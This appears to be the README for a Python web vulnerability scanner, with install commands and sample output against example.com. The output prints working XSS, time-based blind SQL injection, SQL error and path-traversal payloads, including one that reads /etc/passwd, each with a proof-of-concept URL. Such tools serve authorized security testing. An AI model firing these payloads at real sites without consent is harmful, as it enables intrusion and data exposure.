git clone https://github.com/NullS0UL/VulnScanner

cd VulnScanner

python3 vulnscan.py http://example.com/page.php?cat=1

python3 vulnscan.py http://example.com/page.php?cat=1

[*] No WAF Detected.

Target: http://example.com/page.php?cat=1

Powered: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1

[!] Testing Cross Site Scripting (XSS)
[!] 10 Payloads.
[+] 9 Payloads were found.

[*] Payload found!
[!] Payload: <script>alert("inject")</script>
[!] POC: http://example.com/page.php?cat=<script>alert("inject")</script>

[*] Payload found!
[!] Payload: %3Cscript%3Ealert%28%22inject%22%29%3C%2Fscript%3E
[!] POC: http://example.com/page.php?cat=%3Cscript%3Ealert%28%22inject%22%29%3C%2Fscript%3E

[!] Testing SQLInjection
[*] Blind SQL injection time based found!
[!] Payload: 1-SLEEP(2)
[!] POC: http://example.com/page.php?cat=1-SLEEP(2)

[*] SQL Error found.
[!] Payload: '
[!] POC: http://example.com/page.php?cat='

[!] Testing Local File Inclussion (LFI)
[*] Payload found!
[!] Payload: ../../../../etc/passwd
[!] POC: http://example.com/page.php?cat=../../../../etc/passwd


[!] Testing Cross Site Tracing (XST)
[*] This site seems vulnerable to Cross Site Tracing (XST)!

Usage of the VulnScanner for attack targets without prior mutual consent is illegal. 
It is the end user's responsability to obey all applicable local, state, federal and international laws. 
Developer assume no liability and not responsible for any misuse or damage caused by this program.